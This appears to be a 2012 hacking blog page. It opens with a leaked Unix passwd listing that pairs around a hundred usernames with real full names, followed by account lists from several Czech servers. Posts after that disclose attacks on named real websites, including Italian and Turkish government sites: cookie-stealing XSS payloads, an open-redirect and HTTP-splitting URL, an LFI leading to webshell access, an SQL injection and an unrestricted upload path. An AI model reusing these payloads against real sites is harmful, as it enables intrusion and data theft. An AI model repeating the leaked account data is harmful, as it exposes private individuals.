Nirvana:x:967:900:Devir Mahsan:/home/Nirvana:/bin/ushell
roman:x:970:900:Ricciardelli Antonio:/home/roman:/bin/bash
ricchie:x:971:110:SKOROBATSCH PAUL:/home/ricchie:/bin/ushell
toba:x:972:910:Noto Christopher:/home/toba:/bin/ushell
jem:x:974:520:Rothweiler Timo:/home/jem:/bin/ushell
BierFass:x:980:501:Mattick Manfred:/home/BierFass:/bin/ushell
klaus_:x:982:1400:Blumer Klaus:/home/klaus_:/bin/bash
fonzie:x:983:900:buono franco:/home/fonzie:/bin/bash
gott:x:984:990:Hübener Sebastian:/home/gott:/bin/bash
luv:x:985:910:François Mogeon:/home/luv:/bin/ushell
sCoX:x:987:900:arslan metin:/home/sCoX:/bin/ushell
heaven:x:989:1400:Manno Giuseppe:/home/heaven:/bin/bash
SeeeR:x:990:900:Giuliani Samuele:/home/SeeeR:/bin/bash
SFRANTA1:x:991:110:MARIA TERESA D"AFFRONTO:/home/SFRANTA1:/bin/bash
eiloj:x:992:1400:Compagnone Bruno:/home/eiloj:/bin/bash
maGo:x:993:100:Gemelli Giuseppe:/home/maGo:/bin/ushell
sun1:x:994:700:domenico telesca:/home/sun1:/bin/bash
bsk:x:995:401:olivieri fabio:/home/bsk:/bin/ushell
FoOd:x:996:401:roberto ravaioli:/home/FoOd:/bin/bash
ububa:x:997:1400:Anicito Massimo:/home/ububa:/bin/bash
kutusow:x:998:100:Fassbender David:/home/kutusow:/bin/bash
insanity:x:999:1400:Robinson Scott:/home/insanity:/bin/ushell
cyron:x:1000:700:Szau Bastian:/home/cyron:/bin/bash
cub:x:1001:910:Baielli Paola:/home/cub:/bin/ushell
lumino:x:1002:302:Bruno Marcello:/home/lumino:/bin/bash
Mo-r-do:x:1003:700:kannenberg christian:/home/Mo-r-do:/bin/bash
yama:x:1004:100:yama` anton:/home/yama:/bin/bash
Burney:x:1005:100:Musci Francois:/home/Burney:/bin/bash
ma0ri:x:1007:1400:Compagnone Bruno:/home/ma0ri:/bin/bash
bildo:x:1008:100:Mura Giovanni:/home/bildo:/bin/ushell
lex:x:1009:900:Iacomi Dimitri:/home/lex:/bin/ushell
f1re:x:1010:900:Ernst Sascha:/home/f1re:/bin/ushell
rkda:x:1011:1400:Cusato Francesca:/home/rkda:/bin/bash
iroam:x:1012:1400:Compagnone Bruno:/home/iroam:/bin/bash
alturiak:x:1013:900:Gerstner Markus:/home/alturiak:/bin/bash
xednaM:x:1014:1400:Genovese Andrea:/home/xednaM:/bin/bash
Tom-loff:x:1015:700:Pätzold Thomas:/home/Tom-loff:/bin/ushell
JFK:x:1016:100:Schuler Carina:/home/JFK:/bin/ushell
oznam:x:1017:1400:Marzetti Marco:/home/oznam:/bin/ushell
lallo:x:1018:1400:leonardo pedicelli:/home/lallo:/bin/bash
xdu:x:1019:1400:pedicelli leonardo:/home/xdu:/bin/bash
StoMride:x:1020:600:Mueller Stephan:/home/StoMride:/bin/bash
ShortDee:x:1021:900:Marku Dennis:/home/ShortDee:/bin/ushell
planet:x:1022:920:Zeindl Florian:/home/planet:/bin/ushell
CioZzoLo:x:1023:302:salvatore ciaddu:/home/CioZzoLo:/bin/bash
lsSkul:x:1024:1400:Lungo Gianpiero:/home/lsSkul:/bin/ushell
umsp3ctr:x:1025:1400:Lungo Andrea:/home/umsp3ctr:/bin/bash
X-1r0:x:1026:1400:Centenaro Giulio:/home/X-1r0:/bin/bash
Panther:x:1027:700:Thams Stefan:/home/Panther:/bin/bash
WeapoN:x:1028:100:Di Lorenzo Roberto:/home/WeapoN:/bin/bash
evol:x:1029:401:Rossello Pietro:/home/evol:/bin/bash
ztz:x:1030:1400:Seefelder Sascha:/home/ztz:/bin/ushell
jeanlu:x:1031:100:zaghi luca:/home/jeanlu:/bin/bash
redvex:x:1032:900:Savalli Giuseppe:/home/redvex:/bin/bash
sweet:x:1033:700:Janusz Marcin:/home/sweet:/bin/ushell
psyko:x:1034:900:Santarelli Massimiliano:/home/psyko:/bin/ushell
serazzo:x:1035:900:giuliani samuele:/home/serazzo:/bin/bash
QuizIt:x:1036:1400:Martina Martina:/home/QuizIt:/bin/bash
kraddt:x:1037:800:Femmino" Pietro:/home/kraddt:/bin/bash
ski:x:1038:100:bjarnadottir jona:/home/ski:/bin/ushell
voodoo:x:1039:700:Strohschen Dirk:/home/voodoo:/bin/ushell
Sisko:x:1040:700:Söllner Bastian:/home/Sisko:/bin/ushell
Elviz:x:1041:700:Helmes Rainer:/home/Elviz:/bin/ushell
cleon:x:1042:110:filippini marco:/home/cleon:/bin/bash
dream0r:x:1043:1400:Loose Mathias:/home/dream0r:/bin/ushell
Sp33dY:x:1044:700:Huber Michael:/home/Sp33dY:/bin/bash
tidnaB:x:1045:1400:Kovacs Zoltan:/home/tidnaB:/bin/bash
k1cpr2:x:1046:1400:Roberts Craig:/home/k1cpr2:/bin/ushell
B4D:x:1047:200:Ricciardi Stefano:/home/B4D:/bin/ushell
Socksto:x:1048:110:Gian Luigi Bosco:/home/Socksto:/bin/bash
aFaD:x:1049:1400:Becker Anna:/home/aFaD:/bin/ushell
RusTy_X:x:1050:401:Lay Bee Woo:/home/RusTy_X:/bin/bash
nicko:x:1052:100:ciribè christian:/home/nicko:/bin/bash
oknird:x:1053:1400:Paparo Alessandro:/home/oknird:/bin/bash
revol2so:x:1054:1400:Baum Olivier:/home/revol2so:/bin/ushell
solaris:x:1055:900:Pasqui Marko:/home/solaris:/bin/ushell
verTex:x:1056:700:von Ardenne Johannes:/home/verTex:/bin/bash
marlboro:x:1057:401:vincenzo sidari:/home/marlboro:/bin/bash
victory:x:1058:100:paolo traballoni:/home/victory:/bin/bash
seezer:x:1059:900:Goth Sebastian:/home/seezer:/bin/ushell
annoyed:x:1060:1100:scarrà danilo:/home/annoyed:/bin/ushell
gaio:x:1061:401:serravezza andrea:/home/gaio:/bin/bash
s0ka:x:1062:401:Barberi Gambone Giuseppe:/home/s0ka:/bin/bash
Southern:x:1063:401:aversano roberto:/home/Southern:/bin/bash
saras:x:1064:510:Barnes Misty:/home/saras:/bin/bash
belenos:x:1065:100:Quittan Martha Kay:/home/belenos:/bin/bash
m1st4ke:x:1066:100:Paciarelli Simone:/home/m1st4ke:/bin/bash
amater:x:1067:900:Buono Francesco:/home/amater:/bin/ushell
KaTrUm4:x:1068:100:SALVATORE CIADDU:/home/KaTrUm4:/bin/bash
rpm:x:37:37::/var/lib/rpm:/bin/bash
redwater:x:1069:900:Dontchev Sacho:/home/redwater:/bin/bash
maxxboxx:x:1070:600:Rehfeldt Frank:/home/maxxboxx:/bin/bash
n0ru4S:x:1071:1400:Castriotta Michele:/home/n0ru4S:/bin/bash
hak3d:x:1072:100:Barberi Gambone Giuseppe:/home/hak3d:/bin/bash
c0816:x:1073:800:Schneider Manuel:/home/c0816:/bin/bash
Boy:x:1074:401:Pirani Gianfranco:/home/Boy:/bin/bash
zregit:x:1075:1400:Matin Abdul:/home/zregit:/bin/bash
mAxIm:x:1076:401:Aquila Massimo:/home/mAxIm:/bin/bash
M3tSleeP:x:1077:1400:Falco Gianluca:/home/M3tSleeP:/bin/bash
IlCorvob:x:1078:1400:Ruocco Salvatore:/home/IlCorvob:/bin/bash
PedroDJ:x:1079:100:Giannelli Pietro:/home/PedroDJ:/bin/bash
server23:x:1080:100:Dauer Maria:/home/server23:/bin/bash
remote:x:1081:900:terenzio festo:/home/remote:/bin/bash
robertje:x:1082:900:Jonker Robert:/home/robertje:/bin/bash
pArAnOiC:x:1083:900:Gatto Marcello:/home/pArAnOiC:/bin/bash
BladeXP:x:1084:100:Schug Tobias:/home/BladeXP:/bin/bash



-------web.hippowarez.cz-------
 root
toor
daemon
operator
bin
games
news
man
uucp
xten
nobody
fax
ftp
hippo
phippo
cyrus
mysql
annett
pgsql
major
palo
nss
demo
demo4
demo3
demo2
demo1
jezeksw
fandsoft
zasi
hippos
madamshop
hippoware
crctechnik
byttextil
hadek
eurocity

-------www.russia.cz-------
root
toor
daemon
operator
bin
tty
kmem
games
news
man
bind
uucp
xten
pop
nobody
kapitan
mysql
mafo
cyril
eva
ivo
zld
deribin
humtech
eska
money
krona
admin
marie
djason
stealth
trnecek
poulson
dus
alena
grygar
benkova
vanova
marta
havlova
kozel
unique
edward
glebb
jack
ftp



---nicki.moravia-consulting.cz---
root
halt
daemon
operator
bin
games
uucp
ppp
ftp
nobody
ivana
alois
ivona
jana
renata
dalibor
jarka
markus
dana
vilem
martin
hana
petr
radovan
katka
olga
helena
pavel
pavlina
marek
dusan
student
daniela
skinhead
mirek
david
petra
pavelr
robert
radek
pavels
oliver
josef
jiri
vera
dariusz
moravia
calc-pl
ljocha
sausage


---math.feld.cvut.cz---
 root
nobody
daemon
sys
bin
uucp
news
ingres
audit
sync
sysdiag
sundiag
pollara
k301
demlova
adamek
olsak
krajnik
dont
gregorj
navara
nemecek
rogalewi
tkadlec
hamhalte
ptak
brabec
bartik
tiser
zornig
bosak
novakova
nagy
fiedler
prucha
hekrdla
veit
jankovsk
valasek
velebil
kohout
sturm
kucerova
kalous
bilek
veronika
volak
svobodj
korbar
pultar
reiterma
sgp96p
barbw
adamrosi
hovorka
cizek
iqsa
prosek
ftp
ftphide
ws97




NOTE: Those websites/hosts/servers have been shut down long time ago. This is why I'm publishing such informations.

Tuesday, 31 January 2012

http://servizi.pdl.it/ | XSS

http://servizi.pdl.it/cartoline/adesioni/segnala.php

just
<script>alert(document.cookie);</script>
in the form

Friday, 13 January 2012

kutuphane.tuik.gov.tr | data leak, system compromise, HTTP splitting, XSS.

-Data leak-

http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler=

we can see the full path within the errors
-> C:\Inetpub\wwwroot\yordambt
ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php


After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script
There are some shared folders without password on other boxes
------

The scripts available from the website are (also) interacting with other webservers on the local network where are located other documents
ex.: http://10.1.2.49/pdf/0016384.pdf

this information can be taken from a simple search
sample url:
http://kutuphane.tuik.gov.tr/yordambt/url.php?-action=new&-url=aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY=&demirbas=0016384

where we can clearly see a base64 encoded string ( aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY -> http://10.1.2.49/pdf/0016384.pdf ).

and we can easily change the redirect to any other website (the location header)

this example redirects to this website/blog ( http://trueliarx.blogspot.com )
http://kutuphane.tuik.gov.tr/yordambt/url.php?-action=new&-url=aHR0cDovL3RydWVsaWFyeC5ibG9nc3BvdC5jb20v&demirbas=0016384

obviously we are facing an HTTP Splitting problem and we can add other malicious stuff instead of redirecting.


-------------------------------------------------------------------------------------

I suppose that the website have something to do with a -library-  (?). I cannot understand turkish.

Thursday, 12 January 2012

www.ascension-tech.com | XSS

this xss is locked by the webserver
www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0

this one is working without problems because there's a javascript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped.... and we add another one.
http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12


The problem is within "Search Engine Builder 2010"

www.ovosodo.net | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they are not working anymore - check webcaches)
www.ovosodo.net
xss in the requests (simple)

Sql injection (there's no need to write the injection string ... it's very simple)
http://www.ovosodo.net/area_clienti.asp

after *login* it's possible to upload anything that will be available in
http://www.ovosodo.net/images/upload/originali/

Twitter Delicious Facebook Digg Stumbleupon Favorites More